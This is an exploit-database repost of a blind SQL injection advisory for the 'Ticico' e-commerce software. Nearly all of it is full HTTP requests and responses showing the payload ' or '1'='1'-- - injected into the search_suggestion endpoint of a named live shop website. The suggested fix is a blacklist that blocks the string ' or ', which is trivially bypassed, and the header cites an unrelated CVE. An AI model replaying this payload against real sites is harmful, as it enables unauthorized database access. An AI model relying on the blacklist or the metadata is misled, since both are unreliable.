Advertisement






Ticico - Blind SQL Injection

CVE Category Price Severity
CVE-2021-3493 CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2024-02-20
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C/CR:H/IR:H/AR:H/MAV:N/MAC:L/MPR:H/MUI:R/MS:U/MC:H/MI:H/MA:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024020065

Below is a copy:

Ticico - Blind SQL Injection
Author: Gaddar
Recon Date: 18.02.2024

Vuln: SQL Injection(BLIND)
Payload: data' or '1'='1'-- -
Vulnerable File: init.php
Tutorials video: https://www.youtube.com/watch?v=DaBWg1I86PE

Tested on Windows 11 Professional with Burpsuite Community Edition v2023.12.1.5
Website: shop.beyoglucikolata.com.tr

First secure request;

POST /ajax HTTP/2
Host: shop.beyoglucikolata.com.tr
Cookie: PHPSESSID=0373ce0394d206913c0bddfbd779e12c
Content-Length: 49
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://shop.beyoglucikolata.com.tr
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://shop.beyoglucikolata.com.tr/search
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Priority: u=1, i

type=search_suggestion&c_id=0&q=1&t=1708442363774


Response;

HTTP/2 200 OK
X-Powered-By: PHP/7.3.33
X-Powered-By: PleskLin
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Tue, 20 Feb 2024 15:26:10 GMT
Server: LiteSpeed
Alt-Svc: quic=":443"; ma=2592000; v="39,43,46", h3-Q039=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-23=":443"; ma=2592000, h3-24=":443"; ma=2592000

 <div class="search_suggestion"><span class="search_suggestion_error">Ltfen en az 3 karakter giriniz.</span></div>


Vuln. Request;

POST /ajax HTTP/2
Host: shop.beyoglucikolata.com.tr
Cookie: PHPSESSID=0373ce0394d206913c0bddfbd779e12c
Content-Length: 65
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://shop.beyoglucikolata.com.tr
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://shop.beyoglucikolata.com.tr/search
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Priority: u=1, i

type=search_suggestion&c_id=0&q=1' or '1'='1'-- -&t=1708442363774

Vuln. Response;

HTTP/2 200 OK
X-Powered-By: PHP/7.3.33
X-Powered-By: PleskLin
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Tue, 20 Feb 2024 15:26:53 GMT
Server: LiteSpeed
Alt-Svc: quic=":443"; ma=2592000; v="39,43,46", h3-Q039=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-23=":443"; ma=2592000, h3-24=":443"; ma=2592000

 <div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-kek-askim-sutlu-cikolata-kapli-marsmelovlu-kakaolu-sandvic-kek-30-gr-x-24-adet-sade-p-6">Beyolu Kek Akm - Stl ikolata Kapl Marmelovlu Kakaolu Sandvi Kek 30 Gr X 24 Adet Sade</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/bitter-cikolata-kaplamali-findik-kremali-gofret-36-gr-x-24-adet-p-7">Bitter ikolata Kaplamal Fndk Kremal Gofret 36 Gr X 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/findikli-gofret-sutlu-cikolata-ve-findik-parcacik-kaplamali-kremali-gofret-33-gr-x-24-adet-p-8">Fndkl Gofret - Stl ikolata Ve Fndk Parack Kaplamal Kremal Gofret 33 Gr X 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-krem-cikolata-13-findikli-kakaolu-findikli-krema-350-gr-p-9">Beyolu Krem ikolata %13 Fndkl - Kakaolu Fndkl Krema 350 Gr</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-fun-sutlu-cikolata-kapli-karamelli-nuga-bar-36-gr-x-24-adet-p-11">Beyolu Fun - Stl ikolata Kapl Karamelli Nuga Bar 36 Gr X 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-fistik-cikolata-kapli-karamelli-yer-fistikli-nuga-bar-50-gr-x-24-adet-p-12">Beyolu Fstk - ikolata Kapl Karamelli Yer Fstkl Nuga Bar 50 Gr X 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-findiklim-findikli-sutlu-cikolata-38-gr-x-24-adet-p-13">Beyolu Fndklm - Fndkl Stl ikolata 38 Gr X 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/butun-tane-findikli-sutlu-cikolata-30-gr-x-24-adet-p-14">Btn Tane Fndkl Stl ikolata 30 Gr X 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-cikolata-cocorops-sutlu-cikolata-kapli-hindistan-cevizli-bar-50-gr-x-24-adet-p-15">Beyolu ikolata Cocorops Stl ikolata Kapl Hindistan Cevizli Bar 50 GR x 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-kek-askim-dark-bitter-cikolata-kapli-marsmelovlu-kakaolu-sandvic-kek-30-gr-x-24-adet-sade-p-16">Beyolu Kek Akm Dark - Bitter ikolata Kapl Marmelovlu Kakaolu Sandvi Kek 30 Gr X 24 Adet Sade</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-fistiklim-antep-fistikli-sutlu-cikolata-38-gr-x-24-adet-p-17">Beyolu Fstklm - Antep Fstkl Stl ikolata 38 Gr X 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-cikolatali-gofret-sutlu-cikolata-kaplamali-findik-kremali-gofret-36-gr-x-24-adet-p-18">Beyolu ikolatal Gofret - Stl ikolata Kaplamal Fndk Kremal Gofret 36 GR x 24 Adet</a></div>


How to fix this vulnerability?

Add this code in init.php (init.php in main directory.)

function kontrolEt($veri) {
    if (stripos($veri, " or ") !== false) {
        die("<center style='20px 0;font-size:22px;'>Girdiiniz veriler tehlikeli ierikler barndryor. Ltfen yetkililerle iletiime geiniz.</center>");
    }
    else{
        return null;
    }
}
if(route(1) != getAfterSlash(ADMIN_URL)){
    foreach ($_REQUEST as $param => $value) {
        kontrolEt($value);
    }
}

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.